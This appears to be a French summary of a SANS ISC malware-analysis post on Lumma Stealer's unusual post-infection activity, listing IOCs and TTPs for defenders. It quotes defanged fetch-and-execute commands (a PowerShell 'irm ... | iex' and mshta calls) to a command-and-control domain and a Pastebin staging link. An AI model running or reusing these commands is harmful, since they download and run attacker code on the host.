Source: billet signé par Brad Duncan (publié le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer présentant un comportement post-infection inhabituel qui génère une hausse continue de trafic vers un même domaine C2.

Après l’exfiltration des données par Lumma Stealer, l’hôte Windows infecté récupère des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisées pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraînant des requêtes HTTPS répétées vers hxxps[:]//fileless-market[.]cc/.

Ces requêtes sont déclenchées par des commandes mshta hxxps[:]//fileless-market[.]cc/ qui créent des tâches planifiées exécutant la même action. L’activité « s’auto-alimente »: près de 11 heures après l’infection initiale, la machine compromise comptait 31 tâches planifiées aux noms différents mais partageant le même déclencheur et la même action (exécuter mshta vers le même domaine). À 16:02 UTC le 14 janvier 2026, l’auteur a observé 33 flux TCP de sessions HTTPS vers ce serveur C2.

IOC observés 🔎

  • Pastebin: hxxps[:]//pastebin[.]com/raw/xRmmdinT
  • Domaine C2: fileless-market[.]cc
  • Commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex
  • Commande mshta: mshta hxxps[:]//fileless-market[.]cc/
  • TLD utilisé pour C2: .cc

TTPs mis en évidence 🧩

  • Malware: Lumma Stealer (phase post-exfiltration)
  • LOLBins: PowerShell (IRM + IEX), MSHTA pour charger du contenu distant
  • Persistance: création répétée de tâches planifiées avec même action/trigger
  • C2: trafic HTTPS vers un domaine .cc unique qui augmente au fil du temps

Conclusion: billet d’analyse documentant un comportement de post-infection inhabituel et quantifiant le trafic C2 généré; l’objectif est de partager l’observation et d’inviter à signaler des cas similaires.

🧠 TTPs et IOCs détectés

TTP

Malware: Lumma Stealer (phase post-exfiltration), LOLBins: PowerShell (IRM + IEX), MSHTA pour charger du contenu distant, Persistance: création répétée de tâches planifiées avec même action/trigger, C2: trafic HTTPS vers un domaine .cc unique qui augmente au fil du temps

IOC

Pastebin: hxxps[:]//pastebin[.]com/raw/xRmmdinT, Domaine C2: fileless-market[.]cc, Commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, Commande mshta: mshta hxxps[:]//fileless-market[.]cc/

🔗 Source originale : https://isc.sans.edu/diary/32628